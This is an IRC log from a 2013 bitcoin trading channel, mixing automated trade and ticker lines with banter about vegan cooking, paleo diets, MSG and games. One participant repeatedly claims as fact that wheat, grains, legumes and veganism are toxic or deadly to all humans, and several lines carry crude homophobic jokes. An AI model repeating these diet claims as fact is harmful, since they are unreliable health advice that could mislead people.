ThickAsThieves: also, olive oil is lol Jun 18 02:20:09 you savages and our foreignheights Jun 18 02:20:12 your* Jun 18 02:20:22 not using olive oil this time Jun 18 02:20:24 canola Jun 18 02:20:30 canola is extremely toxic to humans Jun 18 02:20:32 I dont recommend it Jun 18 02:20:45 and i wont be able to resist putting some of this chili oil in there Jun 18 02:20:56 put it in the batter Jun 18 02:20:56 oh yeah i have mongolian fire oil too! Jun 18 02:21:05 [HAVELOCK] [ASICM] 52 @ 0.029479 = 1.5329 BTC [-] Jun 18 02:21:06 wtf are you doing anyhow Jun 18 02:21:20 uhh Jun 18 02:21:24 something very manly Jun 18 02:21:30 cant be as manly as my cooking Jun 18 02:21:32 hahaha Jun 18 02:21:41 [HAVELOCK] [ASICM] 48 @ 0.0294799 = 1.415 BTC [+] Jun 18 02:21:42 vegan buffalo wings! Jun 18 02:21:54 .... Jun 18 02:21:59 you're an idiot. Jun 18 02:22:09 it's possible Jun 18 02:22:12 but i'm skeptical Jun 18 02:22:18 I dont give a fuck if its possible, it doesnt mean its healthy Jun 18 02:22:25 most vegan food is toxic to humans and should be avoided at all costs Jun 18 02:22:30 lol Jun 18 02:22:31 i mean it's possible i'm an idiot Jun 18 02:22:31 what are you using for the meat substitute Jun 18 02:22:36 but i'm skeptical Jun 18 02:22:41 what are you using for the meat substitute Jun 18 02:22:46 seitan Jun 18 02:22:55 Diablo-D3 wants you to substitute with his meat Jun 18 02:23:05 ThickAsThieves: oh god, that stuff is toxic Jun 18 02:23:18 tell me more Jun 18 02:23:19 hey no, we use real meat, not meat substitute. Jun 18 02:23:20 its wheat tofu, effectively Jun 18 02:23:29 yeah what deadweasel says is true Jun 18 02:23:35 us men, we eat real fucking buffalo wings Jun 18 02:23:44 from real flying buffalos Jun 18 02:23:44 I even have my own recipe for buffalo wing sauce Jun 18 02:23:57 is that allten dude a BFL shill? Jun 18 02:23:58 Diablo-D3: buffalos don't fly? Jun 18 02:24:20 dub: did he say anything positive about bfl? Jun 18 02:24:20 or have any priors for shilling in general? Jun 18 02:24:25 wheat tofu? Jun 18 02:24:29 it's wheat gluten Jun 18 02:24:42 ThickAsThieves: yes, and tofu is the soybean equiv Jun 18 02:24:46 looks like wet bread to me Jun 18 02:24:49 wheat gluten is toxic to more than 505 of people Jun 18 02:24:57 50% Jun 18 02:25:00 ThickAsThieves: wheat ANYTHING is a good way of dying Jun 18 02:25:10 ThickAsThieves: I'd avoid eating it and avoid it like the plaque Jun 18 02:25:14 *plague Jun 18 02:25:25 it's toxic to me Jun 18 02:25:25 so neither of you eat wheat?! Jun 18 02:25:39 wow that case looks like it was drag tested Jun 18 02:25:58 dub: what, by real dragqueens? Jun 18 02:26:08 ThickAsThieves: nope, I do not eat any wheat Jun 18 02:26:17 ThickAsThieves: no seeds, no seed oils, no flours, breads, or pastas Jun 18 02:26:21 wtf Jun 18 02:26:28 so thats your problem Jun 18 02:26:30 not mine Jun 18 02:26:37 i eat wheat like a mofo Jun 18 02:26:46 I dont think you understand Jun 18 02:26:49 10grain bread n shit Jun 18 02:26:49 its extremely toxic Jun 18 02:26:52 thats why I dont eat it Jun 18 02:27:12 toxic for you or just whomever cant handle it because they arent real men? Jun 18 02:27:38 such diets are the leading cause of heart attacks, strokes, thickened arteries, heart disease, and diabetes Jun 18 02:27:42 toxic for ALL humans Jun 18 02:27:43 everyone Jun 18 02:27:51 TAT< you have no clue about gluten intolerance / celiacs Jun 18 02:27:55 doc says i couldnt be healthier Jun 18 02:27:56 it's brutal, most people don't know they have it Jun 18 02:28:21 ThickAsThieves: your doctor is an idiot Jun 18 02:28:22 maybe my dna is okay with it? Jun 18 02:28:37 most doctors dont understand simple human biology, so hes not alone Jun 18 02:28:44 ThickAsThieves: _no one_ is okay with it Jun 18 02:28:48 probably, but it can be triggered by the new gmo stuff and eating too much of it.... too much of anything is bad. Jun 18 02:28:50 portuguese i have extra hair for filtering Jun 18 02:28:52 YOUR NOT A REAL MAN! Excuse me while I cook vegan buffalo wings Jun 18 02:28:57 :) Jun 18 02:29:00 deadweasel: has nothing to do with gmo Jun 18 02:29:02 lol dubs Jun 18 02:29:12 well i'm not scientist Jun 18 02:29:21 ThickAsThieves: u portuguese? Jun 18 02:29:23 but gmo is no good Jun 18 02:29:28 [07:27:39] such diets are the leading cause of heart attacks, strokes, thickened arteries, heart disease, and diabetes Jun 18 02:29:34 ThickAsThieves: I was not kidding when I said this Jun 18 02:29:35 I had a vegan roommate for a while, death metal guitarist covered in tats Jun 18 02:29:44 dub: that does not compute. Jun 18 02:30:23 canadian to boo(u)t Jun 18 02:30:27 i was vegetarian for two years in high school. bleeding heart and all. Jun 18 02:30:32 it was really good for me Jun 18 02:30:41 but then beer + bbq and it was over. Jun 18 02:30:47 I probably punched you in the face too Jun 18 02:30:48 ThickAsThieves: if you want to die in your 60s or 70s, go ahead and keep eating that wheat Jun 18 02:30:50 but i felt a difference. Jun 18 02:31:01 deadweasel: you felt less homosexually oriented? Jun 18 02:31:23 i am indeed portiguese, yes Jun 18 02:31:26 Azorean Jun 18 02:31:34 portuguese* Jun 18 02:31:38 ThickAsThieves: it doesnt matter where you claim to hail from, you are still human Jun 18 02:31:42 ThickAsThieves: e não dizias nada pah! xD Jun 18 02:31:48 just replying to Vbs Jun 18 02:31:55 ThickAsThieves: that shit is toxic and needs to be eradicated like a common weed Jun 18 02:32:00 eu nao falo Jun 18 02:32:21 i forgot most of the language Jun 18 02:32:25 spoke it as i child Jun 18 02:32:29 hehe Jun 18 02:32:32 took it for 3 years in high school too Jun 18 02:32:34 ThickAsThieves: I do not eat sugars, or non-food ingredients either Jun 18 02:32:46 i can appreciate that diablo Jun 18 02:32:47 ThickAsThieves: infact, the only thing I buy canned anymore is tomato products that I cant source otherwise Jun 18 02:32:56 but i am vegan Jun 18 02:33:03 and cutting out wheat would just be too much Jun 18 02:33:05 then you need to stop being vegan Jun 18 02:33:18 vegan is suicide Jun 18 02:33:31 humans cannot subsist on such diets Jun 18 02:33:35 wheat is pretty poor nutrition wise, you're usually better off not eating anything Jun 18 02:33:47 pankkake: well its worse, its toxic to humans Jun 18 02:33:51 it WILL kill you Jun 18 02:33:52 i am also quite fond of nuts Jun 18 02:33:59 so much so you can quote me on that Jun 18 02:34:00 and kills millions of people ever year Jun 18 02:34:08 ThickAsThieves: not all nuts are created equal Jun 18 02:34:22 Diablo-D3: no, vegetarianism made me more homo Jun 18 02:34:26 my dad took me to the doctor when i was a kid, asking why the fuck i ate so muchpeanut butter Jun 18 02:34:32 hetero* Jun 18 02:34:33 both Jun 18 02:34:34 i love nuts Jun 18 02:34:38 made me horny as hell Jun 18 02:34:46 ThickAsThieves: wat Jun 18 02:34:52 yep Jun 18 02:34:52 pankkake: wat Jun 18 02:34:52 ThickAsThieves: peanuts are not nuts Jun 18 02:34:56 legumes Jun 18 02:34:57 sorry Jun 18 02:35:00 'because you keep feeding it to him dipshit'? Jun 18 02:35:04 but i like nuts too Jun 18 02:35:09 [HAVELOCK] [ASICM] 2 @ 0.02947 = 0.0589 BTC [-] Jun 18 02:35:19 peas, beans, lentils, soybeans, and peanuts should never be eaten Jun 18 02:35:28 lol Jun 18 02:35:33 i guess i'm a dead man Jun 18 02:35:39 you are. Jun 18 02:35:44 and you're insane for continuing that Jun 18 02:35:58 can you at leats provide a link or something Jun 18 02:36:10 you can see how youre delivery is quite hard to swallow Jun 18 02:36:16 pun! Jun 18 02:36:18 ya, all those? Jun 18 02:36:19 YOUR INSANE, BRB BUILDING A WINDMILL FARM Jun 18 02:36:20 hehe Jun 18 02:36:35 your* Jun 18 02:37:23 on wheat, there is the Wheat Belly book Jun 18 02:37:45 mrs dub was readying the eat for your blood type book recently Jun 18 02:37:52 actually makes a bit on sense Jun 18 02:38:06 reading* ffs hate this laptop Jun 18 02:38:34 dub: yeah, I heard about that, it sounded like bullshit Jun 18 02:39:18 http://www.marksdailyapple.com/blood-type-diet/ Jun 18 02:39:21 sounds reasonable to me, decended from hunter gatheres = eat meat, foragers = eat grain and veg Jun 18 02:39:54 http://www.amazon.com/gp/product/0982207786/ref=as_li_ss_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=0982207786&linkCode=as2&tag=adastrapera02-20 Jun 18 02:39:59 ThickAsThieves: there, go buy that and read it Jun 18 02:40:17 not sure i can take the cover seriously... Jun 18 02:40:37 lol, the truth is somewhere in the middle. Jun 18 02:40:44 give it 15 years and check again. Jun 18 02:41:33 deadweasel: or I can give it 10 months and go from 340 to 261 without changing my exercise or caloric intake. Jun 18 02:41:56 you were 340? Jun 18 02:41:57 dub: except we're all descended from farmers, not hunter gatherers and foragers Jun 18 02:42:00 ThickAsThieves: yes. Jun 18 02:42:24 thats a big loss Jun 18 02:42:25 grats Jun 18 02:42:40 all I know is mrs dub likes the meat Jun 18 02:43:04 which fits her blood type and hey, one data point is enough Jun 18 02:43:24 dub: the problem is, eating grain is toxic to all humans, regardless of bloodtype Jun 18 02:43:27 mrs deadweasel likes the meat too Jun 18 02:43:35 but she likes multiple data points throughout the day..... Jun 18 02:43:36 TWO data points Jun 18 02:43:41 deadweasel: hah. Jun 18 02:44:26 data point doesnt sound very manly, data SWORD would be more appropriate (in my case) Jun 18 02:44:38 lol Jun 18 02:44:44 data displacement-of-an-aircraft-carrier Jun 18 02:44:50 worksforme ™ Jun 18 02:46:33 moar like data shiv Jun 18 02:47:07 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [+] Jun 18 02:47:16 data man-cannon. Jun 18 02:48:13 btw, the wp article on paleo is kinda fucked up Jun 18 02:48:23 its still trying to push that whole caveman diet thing Jun 18 02:48:26 which its not Jun 18 02:48:43 what paleo is about is trying to maximize nutrition for optimum energy levels and life expectancy Jun 18 02:49:00 well, many paleo dieters actually believe in the caveman stuff Jun 18 02:49:12 they even named the caveman "grok" Jun 18 02:49:23 grok is a good example for explaining things to noobs Jun 18 02:49:35 people want to name shit, they connect to it more or some equivalent pile of bullshit Jun 18 02:49:47 Im more of a facts, graphs, and tables kind of guy Jun 18 02:50:03 that's how I explain it too, but it feels silly at the same time Jun 18 02:51:13 dude what's going on here Jun 18 02:51:20 https://www.evernote.com/shard/s248/sh/376c807e-d9ba-4690-a786-3ade71d258e2/83dc6ca61f36bc20acfe9b59a393fd29 Jun 18 02:51:24 is this #bitcoin-fags ? Jun 18 02:51:26 my buffalo wing recipe Jun 18 02:51:34 mircea_popescu: apparently so, tat has gone gay Jun 18 02:51:47 mircea_popescu: we're talking about how you should kill an animal a day and eat it Jun 18 02:51:55 yeah. i thought i got in the wrong channel of bitcoin-homo Jun 18 02:52:15 for shame. tit for tat! Jun 18 02:53:17 you know what, I have chicken wings thawed Jun 18 02:53:20 I should make that Jun 18 02:53:39 well, met some person who was convinced even homosexuality can be treated by macrobiotics Jun 18 02:54:07 i hope we won't go into such extremes Jun 18 02:55:00 oh and if soylent really proves so good as they say, i'll be perfectly happy with it Jun 18 02:55:17 no kitchen mess anymore Jun 18 02:55:30 homosexuality cant be cured because, well, no one actually gives a fuck Jun 18 02:55:50 seriously, as long as you pay your taxes and NOT have children, do whatever you want Jun 18 02:55:58 Diablo-D3: the "shake" parts are my favorite xD Jun 18 02:56:19 Vbs: its better than trying to fucking baste them Jun 18 02:56:30 Diablo-D3: very true Jun 18 02:56:41 Im still tweaking it Jun 18 02:56:52 you shouldn't baste children Diablo-D3 , they should be breaded Jun 18 02:56:54 https://campaign.soylent.me/soylent-free-your-body lmao >600k$ raised Jun 18 02:56:57 but its currently better than anything Ive tried Jun 18 02:57:03 deadweasel: no bread, remember? Jun 18 02:57:26 well, another good reason to be gluten intolerant, have to refuse breaded babies Jun 18 02:57:32 inception melting thar Jun 18 02:57:40 Diablo-D3^ Jun 18 02:58:21 [BTCTC] [S.DICE-PT] 36 @ 0.002739 = 0.0986 BTC [+] Jun 18 02:58:23 dub: er, what? Jun 18 02:58:24 all of those * powder shits are 80% msg btw Jun 18 02:58:31 so gg with your no dying Jun 18 02:58:57 trade hippy pseudoscience for proven carcinogens Jun 18 02:59:04 dub: sorry, I dont use msg. Jun 18 02:59:15 btw, the whole attempt at claiming it causes cancer was never true Jun 18 02:59:50 yeah, just in mice Jun 18 02:59:54 no way proven Jun 18 02:59:55 it was purely a business measure enacted by congress to prevent authentic asian restaurants from attacking "red blooded americans" Jun 18 03:00:24 jesus fuck you are a sheep Jun 18 03:00:38 dub: except I dont use msg. Jun 18 03:00:42 my food doesnt need it Jun 18 03:00:59 what is msg? Jun 18 03:01:06 dub: you do realize msg is extremely similar to a chemical our tongue already uses, right? Jun 18 03:01:20 jurov: monosodium glutimate Jun 18 03:01:44 wtf? tomatoes contain glutamate, too Jun 18 03:02:16 jurov: you mean glutamic acid Jun 18 03:02:28 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.00694 = 0.0486 BTC [-] Jun 18 03:02:58 jurov: glutamate is a neurotransmitter used by almost every vertebrate on the planet Jun 18 03:03:09 other wtf? sodium glutamate dissociates in water to the same anion as that acid Jun 18 03:03:10 [HAVELOCK] [ASICM] 38 @ 0.029375 = 1.1163 BTC [-] Jun 18 03:03:14 [HAVELOCK] [ASICM] 1 @ 0.029375 BTC [-] Jun 18 03:03:31 jurov: yup, its completely harmless Jun 18 03:04:55 if it is an acid then why haven't we dissolved yet? Jun 18 03:05:00 atheists 0 christians 1 Jun 18 03:05:10 Scrat: lol. Jun 18 03:05:26 but I wish dub would explain what he was talking about Jun 18 03:05:48 theres no msg in my spices. Jun 18 03:09:25 [HAVELOCK] [ASICM] 1 @ 0.0294 BTC [+] Jun 18 03:14:52 [HAVELOCK] [ASICM] 131 @ 0.029375 = 3.8481 BTC [-] Jun 18 03:19:30 [HAVELOCK] [ASICM] 30 @ 0.0291 = 0.873 BTC [-] Jun 18 03:19:32 [HAVELOCK] [ASICM] 125 @ 0.02901 = 3.6263 BTC [-] Jun 18 03:19:33 [HAVELOCK] [ASICM] 54 @ 0.029003 = 1.5662 BTC [-] Jun 18 03:19:34 [HAVELOCK] [ASICM] 44 @ 0.02900003 = 1.276 BTC [-] Jun 18 03:19:35 [HAVELOCK] [ASICM] 112 @ 0.02900002 = 3.248 BTC [-] Jun 18 03:19:36 [HAVELOCK] [ASICM] 39 @ 0.02900001 = 1.131 BTC [-] Jun 18 03:19:37 [HAVELOCK] [ASICM] 13 @ 0.029 = 0.377 BTC [-] Jun 18 03:19:39 [HAVELOCK] [ASICM] 10 @ 0.029 = 0.29 BTC [-] Jun 18 03:19:40 [HAVELOCK] [ASICM] 323 @ 0.029 = 9.367 BTC [-] Jun 18 03:22:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.02915 = 0.1166 BTC [-] Jun 18 03:23:09 [BTCTC] [ASICMINER-PT] 1 @ 2.8531 BTC [+] Jun 18 03:25:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.028711 = 1.4356 BTC [-] Jun 18 03:27:20 [BTCTC] [DMS.MINING] 13 @ 0.021 = 0.273 BTC [+] Jun 18 03:27:22 [BTCTC] [DMS.MINING] 11 @ 0.021 = 0.231 BTC [+] Jun 18 03:30:56 [BTCTC] [DMS.MINING] 4 @ 0.021 = 0.084 BTC [+] Jun 18 03:32:56 ;;bcstats Jun 18 03:32:58 Current Blocks: 242083 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1852 blocks | Next Difficulty In About: 1 week, 5 days, 20 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: 19698913.3846 | Estimated Percent Change: 1.85972 Jun 18 03:33:03 http://i.imgur.com/Bz9aUi1.png ftr. Jun 18 03:33:09 s.mg looks all set nao. Jun 18 03:37:07 [BTCTC] [ASICMINER-PT] 1 @ 2.898599 BTC [+] Jun 18 03:37:17 [BTCTC] [ASICMINER-PT] 1 @ 2.898599 BTC [+] Jun 18 03:50:29 [BTCTC] [PAJKA.BOND] 3 @ 0.079948 = 0.2398 BTC [+] Jun 18 03:50:44 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [+] Jun 18 03:52:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.028711 = 0.0574 BTC [-] Jun 18 03:53:20 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.00694 = 0.2498 BTC [-] Jun 18 03:56:26 [BTCTC] [S.DICE-PT] 10 @ 0.002737 = 0.0274 BTC [-] Jun 18 03:57:21 [BTCTC] [DMS.MINING] 34 @ 0.021 = 0.714 BTC [+] Jun 18 03:57:24 [BTCTC] [DMS.MINING] 100 @ 0.021 = 2.1 BTC [+] Jun 18 03:58:04 lol Jun 18 03:58:11 [MPEX] [S.MPOE] 4650 @ 0.00067318 = 3.1303 BTC [-] Jun 18 03:58:37 that face is known as the kumface Jun 18 03:58:58 mircea_popescu, i'm an FPS gamer, and the only thing worth it is this open sauce quake3 engine fork: http://www.urbanterror.info/home/ Jun 18 03:59:32 build on the shoulders of giants? Jun 18 03:59:46 id pwn you nub Jun 18 03:59:49 someone did setup a urban terror play for bitcion Jun 18 03:59:50 i don't like fps. Jun 18 03:59:51 dub Jun 18 03:59:53 don't start Jun 18 04:00:00 server, time place Jun 18 04:00:03 1v1 cs 1.6 nao Jun 18 04:00:07 kekeke Jun 18 04:00:27 mircea_popescu, ya but you play shit games Jun 18 04:00:33 the only fps im playing at the moment is arma2 mods Jun 18 04:00:48 since I can't get bf3 going on my shit Jun 18 04:00:56 deadweasel get away kbdmasher guy Jun 18 04:01:14 ;;google kdbmasher guy Jun 18 04:01:15 No matches found. Jun 18 04:01:20 ;;google kdbmasher Jun 18 04:01:21 No matches found. Jun 18 04:01:50 i have no idea what it is Jun 18 04:02:18 [BTCTC] [ASICMINER-PT] 1 @ 2.8986 BTC [+] Jun 18 04:02:19 but i know the quake 3 engine is quality code for any game creator to know Jun 18 04:02:26 [BTCTC] [BITVPS] 11 @ 0.000717 = 0.0079 BTC [+] Jun 18 04:02:28 goog is fucking up Jun 18 04:02:29 john carmacka nd shit Jun 18 04:02:32 srsly Jun 18 04:02:54 its been getting worse for a while but in the last few weeks shit has got totally irrelevant Jun 18 04:03:15 pretty sure they are downrating anything competign with adwords Jun 18 04:03:35 so you get ads and google spamtraps Jun 18 04:03:39 changed the algo again. battle of attrition and useless code. Jun 18 04:03:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.028711 = 0.0574 BTC [-] Jun 18 04:04:04 i noticed a popup get through! i was was horrified. Jun 18 04:04:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00694 BTC [-] Jun 18 04:05:08 [BTCTC] [TAT.ASICMINER] 75 @ 0.028711 = 2.1533 BTC [-] Jun 18 04:06:16 [BTCTC] [TAT.ASICMINER] 75 @ 0.02871 = 2.1533 BTC [-] Jun 18 04:07:27 [BTCTC] [S.MPOE-PT] 10 @ 0.000699 = 0.007 BTC [-] Jun 18 04:10:56 https://github.com/panicsteve/cloud-to-butt Jun 18 04:11:33 [BTCTC] [COGNITIVE] 3 @ 0.310075 = 0.9302 BTC [-] Jun 18 04:16:19 http://totalfratmove.com/this-is-100-the-best-yearbook-quote-youll-read-all-year/ Jun 18 04:16:52 I'd mine her big data Jun 18 04:19:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.028711 = 0.0574 BTC [+] Jun 18 04:20:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.028711 = 0.4307 BTC [+] Jun 18 04:20:23 [BTCTC] [BTC-BOND] 5 @ 0.00985 = 0.0493 BTC [+] Jun 18 04:20:28 [BTCTC] [BTC-BOND] 7 @ 0.00985 = 0.069 BTC [+] Jun 18 04:21:15 [BTCTC] [GSDPT] 8 @ 0.002301 = 0.0184 BTC [-] Jun 18 04:23:31 [BTCTC] [DMS.MINING] 1 @ 0.02002 BTC [-] Jun 18 04:23:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.02871 BTC [-] Jun 18 04:25:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006751 BTC [-] Jun 18 04:26:16 [BTCTC] [DMS.PURCHASE] 1 @ 0.054609 BTC [+] Jun 18 04:29:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.028711 = 0.1148 BTC [+] Jun 18 04:30:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.028711 = 0.0574 BTC [+] Jun 18 04:38:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006917 BTC [+] Jun 18 04:38:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.028711 = 0.1436 BTC [+] Jun 18 04:39:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006918 BTC [+] Jun 18 04:41:44 [BTCTC] [GSDPT] 1 @ 0.002689 BTC [+] Jun 18 04:43:37 [BTCTC] [DMS.MINING] 12 @ 0.0215 = 0.258 BTC [+] Jun 18 04:44:23 [HAVELOCK] [KCIM] 5 @ 1.118 = 5.59 BTC [-] Jun 18 04:49:54 [MPEX] [S.MPOE] 3750 @ 0.00067318 = 2.5244 BTC [-] Jun 18 04:50:54 [BTCTC] [DMS.MINING] 20 @ 0.020021 = 0.4004 BTC [-] Jun 18 04:50:55 [BTCTC] [DMS.MINING] 8 @ 0.02002 = 0.1602 BTC [-] Jun 18 04:50:56 [BTCTC] [DMS.MINING] 50 @ 0.02 = 1 BTC [-] Jun 18 04:50:57 [BTCTC] [DMS.MINING] 100 @ 0.0195 = 1.95 BTC [-] Jun 18 04:52:14 "Paying for College Admissions Essay in BTC" Jun 18 04:52:16 teh world. Jun 18 04:52:25 [BTCTC] [DMS.SELLING] 10 @ 0.035 = 0.35 BTC [-] Jun 18 04:52:26 [BTCTC] [DMS.PURCHASE] 31 @ 0.054609 = 1.6929 BTC [+] Jun 18 04:53:06 [BTCTC] [DMS.PURCHASE] 80 @ 0.054609 = 4.3687 BTC [+] Jun 18 04:53:18 [BTCTC] [ASICMINER-PT] 1 @ 2.8986 BTC [+] Jun 18 04:58:56 [HAVELOCK] [ASICM] 1 @ 0.0293 BTC [+] Jun 18 05:01:01 exclusive video of Avalons shipping http://www.youtube.com/watch?feature=player_embedded&v=tPzRPga6uDg#! Jun 18 05:02:15 love how Brazilians pronounce bitcoin - http://www.youtube.com/watch?v=6ysbgpXaqdE Jun 18 05:07:59 anyone bitme? Jun 18 05:11:58 [MPEX] [S.MG] 1000 @ 0.00010321 = 0.1032 BTC [-] Jun 18 05:16:36 !t m s.mpoe Jun 18 05:16:37 [MPEX:S.MPOE] 1D: 0.0006575 / 0.00068109 / 0.0006991 (889847 shares, 606.07 BTC), 7D: 0.0006575 / 0.00070147 / 0.00073413 (2306261 shares, 1,617.78 BTC), 30D: 0.0006575 / 0.0007081 / 0.00076528 (11335236 shares, 8,026.53 BTC) **** BEGIN LOGGING AT Tue Jun 18 13:42:13 2013 Jun 18 13:43:23 thestringpuller well now i am. Jun 18 14:16:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.029 = 0.087 BTC [-] Jun 18 14:16:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [-] Jun 18 14:16:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [-] Jun 18 14:16:56 [HAVELOCK] [ASICM] 53 @ 0.0297998 = 1.5794 BTC [+] Jun 18 14:16:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.028914 = 1.4457 BTC [-] Jun 18 14:17:00 [HAVELOCK] [ASICM] 54 @ 0.0297999 = 1.6092 BTC [+] Jun 18 14:17:34 [HAVELOCK] [ASICM] 176 @ 0.0299 = 5.2624 BTC [+] Jun 18 14:18:25 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 18 14:38:39 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 18 14:47:26 [BTCTC] [ASICMINER-PT] 2 @ 2.87 = 5.74 BTC [-] Jun 18 14:47:30 [BTCTC] [ASICMINER-PT] 8 @ 2.87 = 22.96 BTC [-] Jun 18 14:49:09 [BTCTC] [TAT.ASICMINER] 89 @ 0.02885 = 2.5677 BTC [-] Jun 18 14:49:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.02884 = 0.1442 BTC [-] Jun 18 14:49:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.02883 = 0.2595 BTC [-] Jun 18 14:49:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02881 BTC [-] Jun 18 14:49:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.028809 = 0.2881 BTC [-] Jun 18 14:49:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.028806 = 1.4403 BTC [-] Jun 18 15:03:04 [HAVELOCK] [ASICM] 150 @ 0.029021 = 4.3532 BTC [-] Jun 18 15:04:24 [HAVELOCK] [ASICM] 150 @ 0.029021 = 4.3532 BTC [-] Jun 18 15:08:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02914 BTC [+] Jun 18 15:09:34 [HAVELOCK] [ASICM] 55 @ 0.02902 = 1.5961 BTC [-] Jun 18 15:09:36 [HAVELOCK] [ASICM] 1 @ 0.029011 BTC [-] Jun 18 15:09:37 [HAVELOCK] [ASICM] 44 @ 0.029 = 1.276 BTC [-] Jun 18 15:17:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02914 BTC [+] Jun 18 15:28:49 [BTCTC] [ASICMINER-PT] 1 @ 2.889998 BTC [+] Jun 18 15:30:18 [HAVELOCK] [ASICM] 1 @ 0.029 BTC [-] Jun 18 15:35:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.02914 = 0.1457 BTC [+] Jun 18 15:45:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.028807 BTC [-] Jun 18 15:57:49 [HAVELOCK] [SDICE] 18 @ 0.22001 = 3.9602 BTC [-] Jun 18 16:02:36 [HAVELOCK] [ASICM] 1 @ 0.0288 BTC [-] Jun 18 16:02:38 [HAVELOCK] [ASICM] 186 @ 0.02876001 = 5.3494 BTC [-] Jun 18 16:02:39 [HAVELOCK] [ASICM] 78 @ 0.02876 = 2.2433 BTC [-] Jun 18 16:02:39 [HAVELOCK] [ASICM] 235 @ 0.02875 = 6.7563 BTC [-] Jun 18 16:08:49 [BTCTC] [DMS.MINING] 40 @ 0.01949 = 0.7796 BTC [+] Jun 18 16:11:09 [HAVELOCK] [ASICM] 2 @ 0.02875 = 0.0575 BTC [-] Jun 18 16:14:54 [BTCTC] [B.YABMC] 2 @ 0.0131 = 0.0262 BTC [-] Jun 18 16:15:19 [BTCTC] [BITVPS] 12 @ 0.000718 = 0.0086 BTC [+] Jun 18 16:15:22 [BTCTC] [BITVPS] 40 @ 0.000718 = 0.0287 BTC [+] Jun 18 16:15:23 [BTCTC] [BITVPS] 100 @ 0.000719 = 0.0719 BTC [+] Jun 18 16:15:25 [BTCTC] [BITVPS] 40 @ 0.000719 = 0.0288 BTC [+] Jun 18 16:15:26 [BTCTC] [BITVPS] 5 @ 0.00072 = 0.0036 BTC [+] Jun 18 16:15:27 [BTCTC] [BITVPS] 30 @ 0.00072 = 0.0216 BTC [+] Jun 18 16:15:28 [BTCTC] [BITVPS] 40 @ 0.00072 = 0.0288 BTC [+] Jun 18 16:15:29 [BTCTC] [BITVPS] 250 @ 0.000721 = 0.1803 BTC [+] Jun 18 16:15:30 [BTCTC] [BITVPS] 500 @ 0.000722 = 0.361 BTC [+] Jun 18 16:22:29 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.006697 = 0.0335 BTC [-] Jun 18 16:29:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.029137 BTC [+] Jun 18 16:32:45 [BTCTC] [ASICMINER-PT] 1 @ 2.889999 BTC [+] Jun 18 16:34:07 [BTCTC] [ASICMINER-PT] 4 @ 2.8998 = 11.5992 BTC [+] Jun 18 16:39:25 [BTCTC] [PAJKA.BOND] 1 @ 0.06001 BTC [+] Jun 18 16:39:29 [BTCTC] [PAJKA.BOND] 8 @ 0.06 = 0.48 BTC [-] Jun 18 16:41:02 ''ticker Jun 18 16:41:04 ;;ticker Jun 18 16:41:05 BTCUSD ticker | Best bid: 108.10001, Best ask: 108.98000, Bid-ask spread: 0.87999, Last trade: 108.10001, 24 hour volume: 37085.94847549, 24 hour low: 100.00000, 24 hour high: 111.98178, 24 hour vwap: 105.49106 Jun 18 16:41:10 ;;bc,stats Jun 18 16:41:12 Current Blocks: 242175 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1760 blocks | Next Difficulty In About: 1 week, 4 days, 8 hours, 30 minutes, and 58 seconds | Next Difficulty Estimate: 20638488.7668 | Estimated Percent Change: 6.7181 Jun 18 16:43:55 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19299 BTC [+] Jun 18 16:43:58 [BTCTC] [CRYPTO-TRADE] 10 @ 0.193 = 1.93 BTC [+] Jun 18 16:45:17 [BTCTC] [CRYPTO-TRADE] 2 @ 0.193001 = 0.386 BTC [+] Jun 18 16:45:48 ;;ticker Jun 18 16:45:48 BTCUSD ticker | Best bid: 111.50000, Best ask: 112.23419, Bid-ask spread: 0.73419, Last trade: 111.50000, 24 hour volume: 39505.23267380, 24 hour low: 100.00000, 24 hour high: 113.30000, 24 hour vwap: 105.95547 Jun 18 16:46:36 hehe Jun 18 16:46:44 just got a mail from btcwarn. very useful Jun 18 16:52:29 http://img.photobucket.com/albums/v297/Mechaman/MPOESMAGICALAVENTUR_zpsf039b514.png Jun 18 16:52:30 lol Jun 18 16:53:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.029133 BTC [-] Jun 18 16:56:49 [BTCTC] [ASICMINER-PT] 1 @ 2.8999 BTC [+] Jun 18 16:56:55 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 18 16:56:57 [BTCTC] [ASICMINER-PT] 1 @ 